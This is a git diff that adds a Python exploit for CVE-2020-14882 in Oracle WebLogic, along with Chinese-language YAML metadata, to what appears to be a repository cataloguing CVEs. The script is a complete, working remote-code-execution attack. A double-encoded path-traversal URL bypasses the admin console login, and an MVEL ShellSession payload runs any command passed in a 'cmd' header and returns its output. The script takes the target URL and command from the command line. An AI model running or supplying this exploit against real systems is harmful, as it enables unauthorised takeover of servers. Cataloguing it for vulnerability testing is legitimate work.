diff --git a/cve/weblogic/2020/CVE-2020-14882/CVE-2020-14882.py b/cve/weblogic/2020/CVE-2020-14882/CVE-2020-14882.py new file mode 100644 index 0000000000000000000000000000000000000000..23d5336d8d16b774b0315e68722b83baed4fd6e9 --- /dev/null +++ b/cve/weblogic/2020/CVE-2020-14882/CVE-2020-14882.py @@ -0,0 +1,64 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# author: XINXINXIANGRONG +import http.client +import requests +import sys +import argparse +http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0' + +payload_cve_2020_14882_v12 = ('_nfpb=true&_pageLabel=&handle=' + 'com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = ' + '(weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = ' + 'executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField' + '("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet' + '.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) ' + 'obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); ' + 'String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]' + '{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result ' + '= new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter' + '("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.' + 'ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);' + 'res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));' + 'res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); ");') + +def cve_2020_14882(url, cmd): + payload = payload_cve_2020_14882_v12 + path = "/console/css/%252e%252e%252fconsole.portal" + headers = { + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,' + 'application/signed-exchange;v=b3;q=0.9', + 'Accept-Encoding': 'gzip, deflate', + 'Accept-Language': 'zh-CN,zh;q=0.9', + 'Connection': 'close', + 'Content-Type': 'application/x-www-form-urlencoded', + 'cmd': cmd + } + try: + request = requests.post(url + path, data=payload, headers=headers, timeout=10, verify=False) + print(request.text) + except Exception as error: + print("[-] Vuln Check Failed... ...") + print("[-] More Weblogic vulnerabilities in https://github.com/zhzyker/vulmap") + + + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Weblogic cve-2020-14882', + usage='use "python %(prog)s --help" for more information', + formatter_class=argparse.RawTextHelpFormatter) + parser.add_argument("-u", "--url", + dest="url", + help="target url (http://127.0.0.1:7001)" + ) + + parser.add_argument("-c", "--cmd", + dest="cmd", + help="command" + ) + args = parser.parse_args() + if not args.url or not args.cmd: + sys.exit('[*] Please assign url and cmd! \n[*] Examples python cve-2020-14882_rce.py -u http://127.0.0.1:7001 -c whoami') + cve_2020_14882(args.url, args.cmd) \ No newline at end of file diff --git a/cve/weblogic/2020/yaml/CVE-2020-14882.yaml b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml new file mode 100644 index 0000000000000000000000000000000000000000..94ff4774967add68f7a8a3d35fd30f4aba41c061 --- /dev/null +++ b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-14882 +source: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py +info: + name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 + severity: critical + description: | + CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台 + scope-of-influence: + weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0 + reference: + https://nvd.nist.gov/vuln/detail/CVE-2020-14882 + https://www.oracle.com/security-alerts/cpuoct2020.html + http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html + http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html + http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-14882 + cwe-id: None + cnvd-id: None + kve-id: None + tags: cve2020, Weblogic \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 24cb593fef16d858c0f7ddf6762a5eac0e1dc113..3bc82cfcd29d04a646ee5827dc7bd95a5a8b3d90 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -86,6 +86,7 @@ cve: - CVE-2022-26134 weblogic: - CVE-2020-2551 + - CVE-2020-14882 polkit: - CVE-2021-4034 - CVE-2021-4115